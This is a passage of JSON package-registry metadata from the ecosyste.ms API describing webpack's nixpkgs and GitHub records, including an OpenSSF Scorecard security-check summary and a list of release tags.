cosyste.ms/api/v1/registries/npmjs.org/packages/webpack4dmall/latest_version","dependent_packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/webpack4dmall/dependent_packages","related_packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/webpack4dmall/related_packages","codemeta_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/webpack4dmall/codemeta","maintainers":[{"uuid":"coolperbs","login":"coolperbs","name":null,"email":"672735341@qq.com","url":null,"packages_count":36,"html_url":"https://www.npmjs.com/~coolperbs","role":null,"created_at":"2022-11-15T10:40:51.001Z","updated_at":"2022-11-15T10:40:51.001Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/maintainers/coolperbs/packages"}],"registry":{"name":"npmjs.org","url":"https://registry.npmjs.org","ecosystem":"npm","default":true,"packages_count":5816876,"maintainers_count":1245095,"namespaces_count":426640,"keywords_count":889778,"github":"npm","metadata":{"funded_packages_count":192526,"rate_limit":2},"icon_url":"https://github.com/npm.png","created_at":"2022-04-04T15:19:23.081Z","updated_at":"2026-09-02T05:02:10.244Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages","maintainers_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/maintainers","namespaces_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/namespaces"}},{"id":13285679,"name":"nodePackages_latest.webpack","ecosystem":"nixpkgs","description":"Packs ECMAScript/CommonJs/AMD modules for the browser. Allows you to split your codebase into multiple bundles, which can be loaded on demand. Supports loaders to preprocess files, i.e. json, jsx, es7, css, less, ... and your custom stuff.","homepage":"https://github.com/webpack/webpack","licenses":"MIT","normalized_licenses":["MIT"],"repository_url":"https://github.com/webpack/webpack","keywords_array":[],"namespace":null,"versions_count":1,"first_release_published_at":"2026-02-02T05:50:41.164Z","latest_release_published_at":"2026-02-02T05:50:41.164Z","latest_release_number":"5.89.0","last_synced_at":"2026-03-08T08:34:32.808Z","created_at":"2026-02-02T05:50:31.840Z","updated_at":"2026-08-27T14:57:52.193Z","registry_url":"https://search.nixos.org/packages?channel=23.11\u0026query=nodePackages_latest.webpack","install_command":"nix-env -iA nixpkgs.nodePackages_latest.webpack","documentation_url":"https://github.com/NixOS/nixpkgs/blob/nixos-23.11/pkgs/development/node-packages/node-packages.nix#L99635","metadata":{"nix_attribute":"webpack-5.89.0","position":"pkgs/development/node-packages/node-packages.nix:99635","platforms":["aarch64-linux","armv5tel-linux","armv6l-linux","armv7a-linux","armv7l-linux","i686-linux","loongarch64-linux","m68k-linux","microblaze-linux","microblazeel-linux","mips-linux","mips64-linux","mips64el-linux","mipsel-linux","powerpc64-linux","powerpc64le-linux","riscv32-linux","riscv64-linux","s390-linux","s390x-linux","x86_64-linux","x86_64-darwin","i686-darwin","aarch64-darwin","armv7a-darwin"],"broken":false,"insecure":false,"unfree":false,"outputs":["out"],"upstream_ecosystem":"npm","upstream_name":"webpack","upstream_purl":"pkg:npm/webpack"},"repo_metadata":{"id":2686067,"uuid":"3678731","full_name":"webpack/webpack","owner":"webpack","description":"A bundler for javascript and friends. Packs many modules into a few bundled assets. Code Splitting allows for loading parts of the application on demand. Through \"loaders\", modules can be CommonJs, AMD, ES6 modules, CSS, Images, JSON, Coffeescript, LESS, ... and your custom stuff.","archived":false,"fork":false,"pushed_at":"2026-08-22T00:09:57.000Z","size":95341,"stargazers_count":65973,"open_issues_count":138,"forks_count":9525,"subscribers_count":1466,"default_branch":"main","last_synced_at":"2026-08-22T13:33:37.681Z","etag":null,"topics":["amd","build-tool","commonjs","compiler","es2015","es6","esm","javascript","javascript-compiler","javascript-modules","loaders","module-bundler","plugins","web","web-performance","webpack"],"latest_commit_sha":null,"homepage":"https://webpack.js.org","language":"JavaScript","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"mit","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/webpack.png","metadata":{"files":{"readme":"README.md","changelog":"CHANGELOG.md","contributing":"CONTRIBUTING.md","funding":null,"license":"LICENSE","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null,"governance":"GOVERNANCE.md","roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null,"zenodo":null,"notice":null,"maintainers":null,"copyright":null,"agents":"AGENTS.md","claude":"CLAUDE.md","gemini":null,"cursor":null,"copilot":null,"dco":null,"cla":null,"disclosure":null},"funding":{"open_collective":"webpack"}},"created_at":"2012-03-10T10:08:14.000Z","updated_at":"2026-08-22T08:28:27.000Z","dependencies_parsed_at":"2026-08-08T12:34:57.314Z","dependency_job_id":null,"html_url":"https://github.com/webpack/webpack","commit_stats":{"total_commits":12493,"total_committers":934,"mean_commits":"13.375802997858672","dds":0.5586328343872569,"last_synced_commit":"89dfc9a5c575dc691e3ac6a965d39c854fca3986"},"previous_names":[],"tags_count":670,"template":false,"template_full_name":null,"purl":"pkg:github/webpack/webpack","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/webpack","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/refs/heads/main","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/sbom","scorecard":{"id":546233,"data":{"date":"2025-07-28","repo":{"name":"github.com/webpack/webpack","commit":"de79ee457eb921e6e1b186c90c65590789a013ca"},"scorecard":{"version":"v5.2.1-26-g4feedb85","commit":"4feedb857ab8d82158aa9774bf8054df41992180"},"score":6,"checks":[{"name":"Code-Review","score":5,"reason":"Found 12/24 approved changesets -- score normalized to 5","details":null,"documentation":{"short":"Determines if the project requires human code review before pull requests (aka merge requests) are merged.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#code-review"}},{"name":"Packaging","score":-1,"reason":"packaging workflow not detected","details":["Warn: no GitHub/GitLab publishing workflow detected."],"documentation":{"short":"Determines if the project is published as a package that others can easily download, install, easily update, and uninstall.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#packaging"}},{"name":"Maintained","score":10,"reason":"30 commit(s) and 12 issue activity found in the last 90 days -- score normalized to 10","details":null,"documentation":{"short":"Determines if the project is \"actively maintained\".","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#maintained"}},{"name":"Dangerous-Workflow","score":10,"reason":"no dangerous workflow patterns detected","details":null,"documentation":{"short":"Determines if the project's GitHub Action workflows avoid dangerous patterns.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#dangerous-workflow"}},{"name":"Token-Permissions","score":10,"reason":"GitHub workflow tokens follow principle of least privilege","details":["Info: topLevel 'contents' permission set to 'read': .github/workflows/dependency-review.yml:6","Info: topLevel 'contents' permission set to 'read': .github/workflows/examples.yml:8","Info: topLevel 'contents' permission set to 'read': .github/workflows/test.yml:13","Info: no jobLevel write permissions found"],"documentation":{"short":"Determines if the project's workflows follow the principle of least privilege.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#token-permissions"}},{"name":"Security-Policy","score":9,"reason":"security policy file detected","details":["Info: security policy file detected: SECURITY.md:1","Info: Found linked content: SECURITY.md:1","Warn: One or no descriptive hints of disclosure, vulnerability, and/or timelines in security policy","Info: Found text in security policy: SECURITY.md:1"],"documentation":{"short":"Determines if the project has published a security policy.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#security-policy"}},{"name":"CII-Best-Practices","score":2,"reason":"badge detected: InProgress","details":null,"documentation":{"short":"Determines if the project has an OpenSSF (formerly CII) Best Practices Badge.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#cii-best-practices"}},{"name":"License","score":10,"reason":"license file detected","details":["Info: project has a license file: LICENSE:0","Info: FSF or OSI recognized license: MIT License: LICENSE:0"],"documentation":{"short":"Determines if the project has defined a license.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#license"}},{"name":"Signed-Releases","score":-1,"reason":"no releases found","details":null,"documentation":{"short":"Determines if the project cryptographically signs release artifacts.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#signed-releases"}},{"name":"Branch-Protection","score":-1,"reason":"internal error: error during branchesHandler.setup: internal error: githubv4.Query: Resource not accessible by integration","details":null,"documentation":{"short":"Determines if the default and release branches are protected with GitHub's branch protection settings.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#branch-protection"}},{"name":"Binary-Artifacts","score":0,"reason":"binaries present in source code","details":["Warn: binary detected: examples/nodejs-addons/file.node:1","Warn: binary detected: examples/wasm-bindgen-esm/pkg/hi_wasm_bg.wasm:1","Warn: binary detected: examples/wasm-simple/add.wasm:1","Warn: binary detected: examples/wasm-simple/factorial.wasm:1","Warn: binary detected: examples/wasm-simple/fibonacci.wasm:1","Warn: binary detected: test/cases/wasm/decoding/memory2.wasm:1","Warn: binary detected: test/cases/wasm/decoding/memory3.wasm:1","Warn: binary detected: test/cases/wasm/imports-complex-types/other.wasm:1","Warn: binary detected: test/cases/wasm/imports-complex-types/wasm.wasm:1","Warn: binary detected: test/cases/wasm/imports-multiple/wasm.wasm:1","Warn: binary detected: test/cases/wasm/v128/v128.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-async/Q_rsqrt.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-async/duff.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-async/fact.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-async/fast-math.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-async/popcnt.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-async/testFunction.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-sync/Q_rsqrt.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-sync/duff.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-sync/fact.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-sync/fast-math.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-sync/popcnt.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-sync/testFunction.wasm:1","Warn: binary detected: test/configCases/wasm/externref/pkg/wasm_lib_bg.wasm:1","Warn: binary detected: test/configCases/wasm/missing-wasm-experiment/wasm.wasm:1","Warn: binary detected: test/configCases/wasm/reference-types/pkg/wasm_lib_bg.wasm:1","Warn: binary detected: test/statsCases/wasm-explorer-examples-sync/Q_rsqrt.wasm:1","Warn: binary detected: test/statsCases/wasm-explorer-examples-sync/duff.wasm:1","Warn: binary detected: test/statsCases/wasm-explorer-examples-sync/fact.wasm:1","Warn: binary detected: test/statsCases/wasm-explorer-examples-sync/fast-math.wasm:1","Warn: binary detected: test/statsCases/wasm-explorer-examples-sync/popcnt.wasm:1","Warn: binary detected: test/statsCases/wasm-explorer-examples-sync/testFunction.wasm:1","Warn: binary detected: test/watchCases/wasm/caching/0/wasm.wasm:1","Warn: binary detected: test/watchCases/wasm/caching/1/wasm.wasm:1"],"documentation":{"short":"Determines if the project has generated executable (binary) artifacts in the source repository.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#binary-artifacts"}},{"name":"Pinned-Dependencies","score":0,"reason":"dependency not pinned by hash detected -- score normalized to 0","details":["Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/dependency-review.yml:13: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/dependency-review.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/dependency-review.yml:15: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/dependency-review.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/examples.yml:16: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/examples.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/examples.yml:20: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/examples.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/examples.yml:29: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/examples.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:19: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:21: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:27: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:33: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:39: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:53: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:55: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:72: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:77: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/test.yml:85: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:96: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:98: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:109: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:111: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:118: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/test.yml:124: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:162: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:163: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:174: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:200: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/test.yml:207: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Info:   0 out of  22 GitHub-owned GitHubAction dependencies pinned","Info:   0 out of   4 third-party GitHubAction dependencies pinned"],"documentation":{"short":"Determines if the project has declared and pinned the dependencies of its build process.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#pinned-dependencies"}},{"name":"Fuzzing","score":0,"reason":"project is not fuzzed","details":["Warn: no fuzzer integrations found"],"documentation":{"short":"Determines if the project uses fuzzing.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#fuzzing"}},{"name":"SAST","score":0,"reason":"SAST tool is not run on all commits -- score normalized to 0","details":["Warn: 0 commits out of 28 are checked with a SAST tool"],"documentation":{"short":"Determines if the project uses static code analysis.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#sast"}},{"name":"Vulnerabilities","score":10,"reason":"0 existing vulnerabilities detected","details":null,"documentation":{"short":"Determines if the project has open, known unfixed vulnerabilities.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#vulnerabilities"}}]},"last_synced_at":"2025-08-20T09:35:41.151Z","repository_id":2686067,"created_at":"2025-08-20T09:35:41.151Z","updated_at":"2025-08-20T09:35:41.151Z"},"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":286080680,"owners_count":36825724,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2026-08-06T04:43:03.162Z","status":"online","status_checked_at":"2026-08-22T02:00:06.114Z","response_time":51,"last_error":null,"robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":true,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"},"owner_record":{"login":"webpack","name":"webpack","uuid":"2105791","kind":"organization","description":"","email":null,"website":"https://webpack.js.org","location":null,"twitter":null,"company":null,"icon_url":"https://avatars.githubusercontent.com/u/2105791?v=4","repositories_count":50,"last_synced_at":"2024-10-29T23:38:53.364Z","metadata":{"has_sponsors_listing":false,"funding":{"open_collective":"webpack"}},"html_url":"https://github.com/webpack","funding_links":["https://opencollective.com/webpack"],"total_stars":95072,"followers":924,"following":0,"created_at":"2022-11-02T16:19:08.894Z","updated_at":"2024-10-29T23:38:53.365Z","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/webpack","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/webpack/repositories"},"tags":[{"name":"v5.109.2","sha":"6a24bd65b72c43207c36ce61b54e1f5833486906","kind":"tag","published_at":"2026-07-28T18:14:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.109.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.109.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.109.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.109.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.109.2/manifests"},{"name":"v5.109.1","sha":"ec3908838175b79c004f61f9bf53d57a6d0e52f8","kind":"tag","published_at":"2026-07-27T21:58:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.109.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.109.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.109.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.109.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.109.1/manifests"},{"name":"v5.109.0","sha":"21cd11a1f53567a42eee3a0be822b968a1ffcb12","kind":"tag","published_at":"2026-07-23T19:19:29.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.109.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.109.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.109.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.109.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.109.0/manifests"},{"name":"v5.108.4","sha":"bb9ccfd32b8059819204a48bdb5436c9266dcdf0","kind":"tag","published_at":"2026-07-04T18:09:50.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.108.4","html_url":"https://github.com/webpack/webpack/releases/tag/v5.108.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.108.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.108.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.108.4/manifests"},{"name":"v5.108.3","sha":"6844305fc2d9bceab547b6aae6fcd7ab12d598d8","kind":"tag","published_at":"2026-06-29T22:00:20.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.108.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.108.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.108.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.108.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.108.3/manifests"},{"name":"v5.108.2","sha":"4dfe770e543f8e0c59184b9767e19b604d01af88","kind":"tag","published_at":"2026-06-29T12:56:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.108.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.108.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.108.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.108.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.108.2/manifests"},{"name":"v5.108.1","sha":"da91761ed92c8e133ee321c7db4ad6c4698cae0a","kind":"tag","published_at":"2026-06-26T13:04:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.108.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.108.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.108.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.108.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.108.1/manifests"},{"name":"v5.108.0","sha":"322b0603d6cae784063482cdc3cf8ca0b135a422","kind":"tag","published_at":"2026-06-25T09:40:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.108.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.108.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.108.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.108.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.108.0/manifests"},{"name":"v5.107.2","sha":"cfb24a4af6ea68034b25f80e14f95aaeaad6d596","kind":"tag","published_at":"2026-05-25T15:18:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.107.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.107.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.107.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.107.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.107.2/manifests"},{"name":"v5.107.1","sha":"a1ce7ebea4069d31ba27da07c07839d9dc1d69d6","kind":"tag","published_at":"2026-05-21T14:29:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.107.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.107.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.107.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.107.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.107.1/manifests"},{"name":"v5.107.0","sha":"4657874201bb3a098445fca14e2f271c82a3f91c","kind":"tag","published_at":"2026-05-20T09:40:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.107.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.107.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.107.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.107.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.107.0/manifests"},{"name":"v5.106.2","sha":"0d7e3e0153f0696311a590f90620506e8ab166ac","kind":"tag","published_at":"2026-04-15T11:44:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.106.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.106.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.106.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.106.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.106.2/manifests"},{"name":"v5.106.1","sha":"a934b9bb0330aba61e759ef943b7303ba305959f","kind":"tag","published_at":"2026-04-10T10:42:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.106.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.106.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.106.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.106.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.106.1/manifests"},{"name":"v5.106.0","sha":"8774a0110bea46f33fd2c504f59e698dbdcf136e","kind":"tag","published_at":"2026-04-08T15:11:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.106.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.106.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.106.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.106.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.106.0/manifests"},{"name":"v5.105.4","sha":"27c13b44c861908793f160f9f7413b32543c0522","kind":"tag","published_at":"2026-03-03T16:29:54.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.105.4","html_url":"https://github.com/webpack/webpack/releases/tag/v5.105.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.105.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.105.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.105.4/manifests"},{"name":"v5.105.3","sha":"714a0e3496f2189f76b5d2c98eacdeedae9e7c06","kind":"tag","published_at":"2026-02-26T10:27:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.105.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.105.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.105.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.105.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.105.3/manifests"},{"name":"v5.105.2","sha":"0756c7eb697a7759afe081a1fcf8f5481ea06bc3","kind":"tag","published_at":"2026-02-12T15:19:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.105.2","html_url":"https://github.com/webpack/webpa